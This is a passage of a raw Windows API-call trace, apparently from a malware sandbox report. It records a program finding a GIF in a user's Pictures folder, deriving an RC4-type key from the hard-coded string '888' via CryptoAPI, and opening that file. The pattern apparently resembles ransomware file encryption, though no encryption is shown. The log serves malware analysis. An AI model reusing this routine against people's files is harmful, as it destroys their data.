RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.126] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/pkrWGiqtaBO.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcca0f1f0, ftCreationTime.dwHighDateTime=0x1d5ce46, ftLastAccessTime.dwLowDateTime=0xf2ae86f0, ftLastAccessTime.dwHighDateTime=0x1d5d3f5, ftLastWriteTime.dwLowDateTime=0xf2ae86f0, ftLastWriteTime.dwHighDateTime=0x1d5d3f5, nFileSizeHigh=0x0, nFileSizeLow=0x18b56, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkrWGiqtaBO.gif", cAlternateFileName="PKRWGI~1.GIF")) returned 0x9e1ab8 [0211.126] FindClose (in: hFindFile=0x9e1ab8 | out: hFindFile=0x9e1ab8) returned 1 [0211.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0211.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0211.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0211.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.128] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.128] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0211.129] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.129] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0211.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.130] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.130] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.131] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.131] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0211.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0211.131] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.131] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0211.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0211.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7220, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0211.132] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c6e8) returned 1 [0211.133] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0211.133] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0211.134] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.134] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.134] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0211.134] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0211.134] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.134] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.134] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.135] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.135] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.135] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.135] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.135] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.135] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.135] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.135] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab2c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0211.135] CryptCreateHash (in: hProv=0xa7c6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0211.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ca8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.135] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0211.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.135] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.136] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0211.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab308, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0211.136] CryptHashData (hHash=0x9e2078, pbData=0x2a71c98, dwDataLen=0x3, dwFlags=0x1) returned 1 [0211.136] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.136] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.136] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.136] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab398, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0211.136] CryptDeriveKey (in: hProv=0xa7c6e8, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2238) returned 1 [0211.136] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.136] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0211.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6ee0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0211.136] CryptDestroyHash (hHash=0x9e2078) returned 1 [0211.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0211.137] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0211.137] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.137] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.137] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.138] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/pkrWGiqtaBO.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\pkrwgiqtabo.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0211.139] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 